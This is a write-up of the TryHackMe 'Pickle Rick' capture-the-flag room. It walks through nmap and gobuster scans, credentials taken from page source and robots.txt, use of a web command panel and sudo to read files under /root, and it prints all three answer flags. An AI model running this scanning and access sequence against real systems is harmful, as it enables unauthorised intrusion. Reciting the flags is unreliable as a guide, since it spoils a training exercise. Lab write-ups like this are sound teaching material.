Pickle Rick

tryhackme.com - © TryHackMe

🔗 Pickle Rick

Task 1 - Deploy the machine

🎯 Target IP: 10.10.150.53

Create a directory for machine on the Desktop and a directory containing the scans with nmap.

This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.

Deploy the virtual machine on this task and explore the web application: 10.10.150.53

You can also access the web application using the following link: https://10-10-150-53.p.thmlabs.com (this will update when the machine has fully started)

Task 2 - Reconnaissance

su
echo "10.10.150.53 pickle_rick.thm" >> /etc/hosts

mkdir thm/pickle_rick.thm
cd thm/pickle_rick.thm

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.

ping -c 3 pickle_rick.thm

PING pickle_rick.thm (10.10.150.53) 56(84) bytes of data.
64 bytes from pickle_rick.thm (10.10.150.53): icmp_seq=1 ttl=63 time=72.8 ms
64 bytes from pickle_rick.thm (10.10.150.53): icmp_seq=2 ttl=63 time=80.6 ms
64 bytes from pickle_rick.thm (10.10.150.53): icmp_seq=3 ttl=63 time=61.8 ms

Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.

Seeing html source page we found this precious info about username

Username: R1ckRul3s

2.1 - What is the first ingredient that Rick needs?

Try to scan open ports is always a good solution:

nmap -p- --open -sS -n -Pn pickle_rick.thm -oG open_ports

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-17 14:30 BST
Nmap scan report for pickle_rick.thm (10.10.150.53)
Host is up (0.066s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:E1:EC:48:00:3F (Unknown)

nmap -p22,80 -sS -n -Pn -sV -sC 10.10.150.53

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-17 14:30 BST
Nmap scan report for pickle_rick.thm (10.10.150.53)
Host is up (0.00015s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d0:cf:de:e0:28:b0:c4:60:97:9f:9d:50:2e:35:4c:bd (RSA)
|   256 24:c9:a0:ef:86:7e:1b:78:f8:d4:59:87:ce:cd:61:68 (ECDSA)
|_  256 c9:dc:d4:4d:b0:ec:16:7d:d6:97:ed:43:3b:6d:a2:80 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
MAC Address: 02:E1:EC:48:00:3F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We know username and IP and we can try to access with SSH port

ssh R1ckRul3s@10.10.150.53

The authenticity of host '10.10.150.53 (10.10.150.53)' can't be established.
ECDSA key fingerprint is SHA256:OFFPjHbvGX9Hd++AM6ynQflPu+GRjTFQluD10V6Fg1A.
Are you sure you want to continue connecting (yes/no)? yes
PWarning: Permanently added '10.10.150.53' (ECDSA) to the list of known hosts.
R1ckRul3s@10.10.150.53: Permission denied (publickey).

Nothing to do: Permission denied!

We can try to explore potential directory of website using gobuster

gobuster dir -u 10.10.150.53 -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.150.53
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/06/17 15:11:25 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/assets (Status: 301)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2023/06/17 15:11:26 Finished
===============================================================

We visit /robots.txt and we found this info (maybe password)

/robots.txt

Wubbalubbadubdub

Since we didn't find any login pages, let's try using nmap's http-enum script

nmap -p80 --script http-enum 10.10.150.53

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-17 15:18 BST
Nmap scan report for ip-10-10-150-53.eu-west-1.compute.internal (10.10.150.53)
Host is up (0.00015s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /login.php: Possible admin folder
|_  /robots.txt: Robots file
MAC Address: 02:E1:EC:48:00:3F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds

Good news, we found login.php page

Inserting user and psw found into index.html source code: R1ckRul3s and robots.txt: Wubbalubbadubdub, we give access!

Now, we have a command panel, where we can launch our commands.

Using whoami we check that we're www-data user, with the ls command we explore the current directory where we find the first flag

Cat command doesn't work, for this reason we use "less" command to read flag

🚩 Flag 1 (Sup3rS3cretPickl3Ingred.txt)

mr. meeseek hair

2.2 - What is the second ingredient in Rick’s potion?

Reading clue.txt file we found another important info

Exploring file system we found the 2nd ingredient

ls -ah ../../../home/rick

less ../../../home/rick/second ingredients

🚩 Flag 2 (second ingredients)

1 jerry tear

2.3 - What is the last and final ingredient?

Usually the last flag is in the protected/root folder, we try to find it

sudo ls -ah ../../../root/3rd.txt

sudo less ../../../root/3rd.txt

🚩 Flag 3 (3rd.txt)

fleeb juice